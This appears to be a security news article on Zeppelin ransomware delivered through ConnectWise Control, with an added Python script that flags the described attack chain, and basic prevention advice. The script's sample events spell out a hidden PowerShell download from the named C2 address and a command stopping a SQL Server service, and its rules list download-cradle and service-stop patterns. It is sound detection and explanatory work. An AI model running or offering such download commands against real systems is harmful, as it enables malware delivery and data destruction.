A new threat shakes Windows users. In this case it is a ransomware attack that comes through the popular ConnectWise Control application (which was previously called ScreenConnect). It is an application widely used to connect remotely to other computers. It is especially used to obtain support. The goal of hackers is to infect the computer with the Zeppelin ransomware.
One of the most important threats today is a type of malware that has kept growing in recent years despite improvements in security tools. There are many different variants, and their infection methods differ just as widely.
The attackers rely on the remote desktop application ConnectWise Control: through this program they are able to infect the system and introduce the Zeppelin ransomware. This causes users' files to be encrypted, leaving them without control over their own data.
The attackers' goal with this type of malware is to obtain financial gain in exchange for decrypting the files. This is something that can affect businesses in particular. Precisely the tool we are talking about, ConnectWise Control, is widely used by companies to access files shared from other computers.
The security researchers who discovered this threat explain that it affects both the United States and Europe, and that the attacks target very diverse sectors, where the attackers also steal information from the compromised systems.
How Zeppelin works
It is mainly distributed through the remote desktop application ConnectWise Control. The attackers then create and execute a hidden run.cmd file that contains the commands to be run remotely. Next, they execute a PowerShell command that downloads the next stage from the C2 server at hxxp://45.142.213[.]167/oxf; that stage connects to the C2 server once more to download the Zeppelin ransomware file itself.
The attackers also run a list of commands that stop database processes, so that victims cannot overwrite their backups with the infected data.
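The delivery chain described above (ConnectWise Control client spawning a hidden run.cmd, a PowerShell download from the C2 address, and commands stopping database services) can be turned into simple process-creation detection rules. The following script is an added example written for this article, not code from the researchers or from ConnectWise; hostnames, command lines and the sample events are constructed for illustration.

```python
# Added example: score constructed process-creation events against the
# Zeppelin delivery chain stages described in the article.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str    # parent image name (e.g. from Sysmon Event ID 1 / 4688)
    image: str     # child image name
    cmdline: str   # full command line


# C2 address from the article, kept defanged in source and refanged only for matching.
ZEPPELIN_C2_IP = "45.142.213[.]167".replace("[.]", ".")

# Each rule: (name, predicate). Heuristics mirror the stages in the article.
RULES = [
    ("screenconnect_spawns_run_cmd",
     lambda e: "screenconnect" in e.parent.lower()
     and e.image.lower() == "cmd.exe" and "run.cmd" in e.cmdline.lower()),
    ("powershell_download_cradle",
     lambda e: e.image.lower() in ("powershell.exe", "pwsh.exe")
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                   e.cmdline, re.I) is not None),
    ("known_zeppelin_c2", lambda e: ZEPPELIN_C2_IP in e.cmdline),
    ("database_service_stop",
     lambda e: e.image.lower() in ("net.exe", "net1.exe", "sc.exe", "taskkill.exe")
     and re.search(r"\bstop\b|/im\b", e.cmdline, re.I) is not None
     and re.search(r"mssql|sql|oracle|mysql|postgres", e.cmdline, re.I) is not None),
]


def match_rules(event):
    """Names of every rule the single event satisfies."""
    return [name for name, pred in RULES if pred(event)]


def analyze(events):
    """Map host -> sorted rule names, for hosts hitting at least two chain stages."""
    hits = {}
    for e in events:
        for name in match_rules(e):
            hits.setdefault(e.host, set()).add(name)
    return {h: sorted(r) for h, r in hits.items() if len(r) >= 2}


# Constructed sample events (hypothetical hosts and command lines).
SAMPLE_EVENTS = [
    ProcEvent("WS01", "ScreenConnect.ClientService.exe", "cmd.exe",
              r"cmd.exe /c C:\ProgramData\run.cmd"),
    ProcEvent("WS01", "cmd.exe", "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient)"
              ".DownloadFile('http://45.142.213.167/oxf','C:\\Users\\Public\\oxf')"),
    ProcEvent("WS01", "cmd.exe", "net.exe", "net stop MSSQLSERVER /y"),
    ProcEvent("WS02", "explorer.exe", "powershell.exe", "powershell Get-Process"),
]

if __name__ == "__main__":
    for host, rules in analyze(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Requiring two or more stages on the same host keeps a lone administrative `net stop` or an ordinary PowerShell invocation from raising an alert on its own.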
How to avoid being victims of this threat?
The best way to avoid becoming a victim of this type of problem is to always keep systems and applications updated. It is vital that we have the latest patches and updates correctly installed; in this way we can block the entry of threats.
Up-to-date security tools are also essential: with them we can prevent malware from getting in and scan our system for possible malicious files.
In many cases this type of threat arrives after a mistake made by the user, for example downloading fraudulent files sent to us by email.